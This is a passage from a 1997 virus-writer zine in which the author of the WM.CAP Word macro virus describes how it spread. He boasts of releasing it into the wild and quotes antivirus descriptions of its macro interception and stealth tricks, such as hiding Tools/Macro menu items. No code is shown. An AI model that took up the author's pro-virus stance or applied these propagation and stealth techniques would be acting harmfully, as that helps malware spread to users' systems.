Becoz of this and becoz i lost my interest in macro virii stuff
since that time on, i dunno if these macro trickz will also work
under Word'97, i guess not. However, if other VXerz are interested
in these topicz and want to add more robustness to their macro
virii under Word'97, they should consider the problemz described
above. I hope this article could be useful for that purpose. Thats
all, folkz.
5. Disclaimer This information is for educational purposez only.
The author is not responsible for any problemz caused by the use of
this information.
(c) 1997. Jacky Qwerty / 29A.
WM.CAP virus description > Jacky Qwerty/29A This article
gives a full description of the WordMacro CAP virus. It can be seen
as a "real" example for the different techniqz described in the
past article named "Macro virus trickz". Check out as well the
virus source code, also published in this isue.
Index 1. Introduction 1.1 Macro virus hype 2. WM.CAP: a complex
word macro virus? 3. In the Newz 3.1. Dr.Solomon speaks 3.2. Sophos
speaks 3.3. McAfee speaks 3.4. F-Potatoe speaks 3.5. Norton speaks
3.6. AVP speaks 3.7. Quarterdeck speaks 4. Functional Description
4.1. Removal of macroz 4.1.1. Concept vs. Wazzu 4.1.2. CAP vs.
Concept 4.2. Global template infection 4.2.1. Searchin for
localized macroz 4.2.2. Incremental generation count 4.2.3. Removal
of menu itemz - stealth 4.3. Document, template and RTF infection
4.4. Disablin of AutoMacroz 4.5. The "SaveAs" problem solved 5.
Shortcutz 6. Disclaimer
1. Introduction Factz prove for themselvez. Macro virii have
become one of the most comon type of computer virus. While the
latter sounds like a press release, we cant deny that unfortunately
it is becomin true. "Unfortunately" becoz as u will see later,
macro virii unlike other type of computer virii, are not really
very dificult to write, in fact much of them have been coded in a
very simple way, followin a straightforward programin aproach.
While there could be some few exceptionz to the rule, macro virii
in general dont prove to deserve that kind of atention that other
more interestin type of computer virii mite do, regardin other
innovative infection techniqz, new wayz of residency, improved
methodz for trapin file activity and the complexity of the virus
code itself. Featurez which are very dependent to a great extent on
the skillz of the VXer himself.
1.1. Macro virus hype But leavin aside that atonishin publicity
surroundin macro virii and now followin a much more objetive
aproach: what lies behind the creation of a macro virus? is it
really hard to write such virusez? why so much hype bout Concept?
well, not really. Much of that fuzz was nonsense, another press
release biten and exagerated by the obfuscating media. I rememeber
at the time Concept was big newz, AVerz started to say repeatedly
again and again
that such macro virii were fairly easy to write and that they
could be more infectious and comon than any other virus type. Yea
AVerz, strangely tho, said the mean and lean truth. So now they
come, shoot our mindz and then wash their handz pretendin they have
nothin to do with the macro virus hype. After all, we are the
"kidz" so we are the guilty onez, we are the bad guyz and they are
of course the heroez of the movie. Same old story.
2. WM.CAP: a complex macro virus? CAP was a macro virus i wrote
durin a bored December weekend after endin classes for the quarter
and startin my xmas vacationz. It was also my first and last macro
virus until i lost all of my interest in this stuff and focused my
atention on other much more interestin virus related topicz :) It
began as a curiosity of mine when tryin to understand for myself
how these virusez worked and how much they could spread for
themselvez. The CAP virus made its way into the wild the same way
most other virusez do. It was writen in a simple 386 machine runin
Windoze 3.1, it was tested in both english and spanish versionz of
Word 6, and was finaly released and spread as with any other macro
virus. Yea, it has some pretty kewl featurez but they are far from
bein extraordinary or complex as some AVerz put it, especialy an
AVer named Miko Hyppnen from Datafellowz (F-Potatoe), a very nice
dude, author of F-Potatoe buletinz, who btw behaved very kind in
his last isue when he encouraged people to send their "opinion on
virus writin" to my Hotmail mailbox. I wont forget that one, Miko,
very nice from u, pal. However it was also the first time i thanked
the phuckin mother who hacked my Hotmail acount, hrmph
@&%#..
3. In the newz Shortly after CAP was released, there apeared a
seriez of increasin reportz posted on several newsgroupz,
especially from alt.comp.virus. Userz were suspectin about a new
macro virus removin the Toolz/Macro and Toolz/Customize menu itemz
from their Word enviroment. A couple of monthz later, CAP was bein
reported at diferent regionz worldwide. Was CAP just another lucky
virus or there was somethin more behind? Well, just keep readin if
u want to know the mean and lean truth. #8) But before this lets
listen to what AVerz have to say about CAP, that mite help us
understand some more about CAP's functionin, mmm.. well, just a bit
coz u know how some AVerz are, regardin their virus descriptionz.
They feed on hype describin how good their AV programz detect
virusez, instead of describin how the virusez really work and how
some of them are able to defeat and nulify their stuff. Most of the
AV programz agree they can safely remove all (removable) virusez
they detect. Factz prove this is not true. None of the macro AV
programz, except perhaps new versions of F-MacroW, have been able
to remove properly all of the CAP spontaneously generated variantz.
And as u'll see later in this article, this behavior could have
been made much more complex on purpose.
3.1. Dr.Solomon speaks (*) Dr.Solomon -
http://www.drsolomon.com/vircen/valerts/wmcap.html - - - - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/CAP This macro virus appeared first in February 1997 and has
quickly become widespread. The basic virus consists of one large
macro called CAP (hence the name) which is called from the virus'
other
macros - AutoExec, AutoOpen, FileSave, FileSaveAs,
FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose. When
the virus replicates, the first thing it does is to copy the basic
set of 10 macros. The virus then browses the WinWord menu items,
collects their names, (they could be different in different
language versions, or customized versions of WinWord), and
intercepts up to 5 of these additional macros - placing a pointer
to the main CAP macro inside them. If there are any system macros
defined in a global template before the infection - they are
deleted. The virus also removes the menu items Tools/Macro and
Tools/Customize. The File/Templates menu item is present after
infection but it does not work. In essence, then, the virus
consists of 10 basic English macros and up to 5 additional macros
taken from the menus if they are not standard for the English
language version of WinWord. The virus uses information from the
macro description field, (at the bottom of Tools/Macro box), for
self recognition of its core macros. These have "F%" at the
beginning of a description (FileOpen has F%O, FileClose - F%C,
FileSave - F%S and FileSaveAs - F%SA). The virus has no damaging
payload except that it removes system macros defined in the global
template. - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - - - ->8
3.2. Sophos speaks (*) Sophos -
http://www.sophos.com/virusinfo/analyses/winwordcap.html - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
->8 Virus analyses Winword/CAP Virus Name:Winword/CAP. Aliases:
None known. Type: MS Word document infector. Resident: Yes, within
Word environment. Stealth: Yes. Empty macros are used to prevent
Word showing menu items. For example, the ToolsMacro (or
ExtrasMakro under German Word) is empty, which prevents the use of
the ToolsMacro to see whether or not there are macros present. The
virus also removes the menu item itself so that it does not even
appear in the list of available choices. Trigger: None. Payload:
None. Comments: The Winword/CAP virus installs the following
macros: FileTemplates, ToolsMacro, FileSaveAs, FileClose,
AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and CAP. In
addition, the virus will find the current local language version of
the macros and will install these as well as the English ones. For
example, if the virus infects a German version of Word, it will
also install macros named DateiOffnen, DateiSpeichern,
DateiSpeichernUnter, DateiSchliebenOderAllesSchlieben. With the
exception of the CAP macro itself, all the macros are very short
stubs which either call subroutines within CAP or do nothing at
all. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- - - - - ->8
3.3. McAfee speaks (*) McAfee -
http://www.mcafee.com/support/techdocs/vinfo/vm007.asp - - - - - -
- - - - - - - - - - - - - -